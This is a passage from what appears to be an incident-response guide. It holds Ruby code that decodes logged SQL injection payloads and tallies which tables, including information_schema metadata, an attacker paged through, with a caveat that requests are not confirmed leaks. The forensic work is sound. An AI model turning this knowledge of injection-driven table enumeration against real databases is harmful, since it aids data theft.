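    text.match?(/\A[\x20-\x7E]+\z/) ? "'#{text}'" : lit
  end
end

# Summarises, per queried table, how many distinct row offsets were requested.
# Queries against information_schema are labelled with the schema/table whose
# metadata they enumerate. Count-only queries (no "limit") add no rows.
def exfiltration_scope(payloads)
  offsets = Hash.new { |h, k| h[k] = [] }
  payloads.each do |raw|
    sql = decode_hex_literals(raw)
    from = sql.match(/\bfrom\s+`?(\w+)`?\.`?(\w+)`?/i) or next
    target = "#{from[1]}.#{from[2]}"
    if from[1].casecmp?('information_schema')
      schema = sql[/table_schema\s*=\s*'([^']*)'/i, 1]
      table = sql[/table_name\s*=\s*'([^']*)'/i, 1]
      about = [schema, table].compact.join('.')
      target += " (metadata of #{about})" unless about.empty?
    end
    offset = sql[/\blimit\s+(\d+)\s*,\s*\d+/i, 1]
    offsets[target] << offset.to_i if offset
  end
  offsets.transform_values { |o| { rows_requested: o.uniq.size, max_offset: o.max } }
end

if __FILE__ == $PROGRAM_NAME
  puts decode_hex_literals('select 0x2128265E29284023')
  exfiltration_scope(SAMPLE_PAYLOADS).each { |target, s| puts "#{target}: #{s.inspect}" }
end
```

The counts are requests seen in the log, not rows confirmed as returned; compare them with the response sizes of the same log lines before stating how much data left the system.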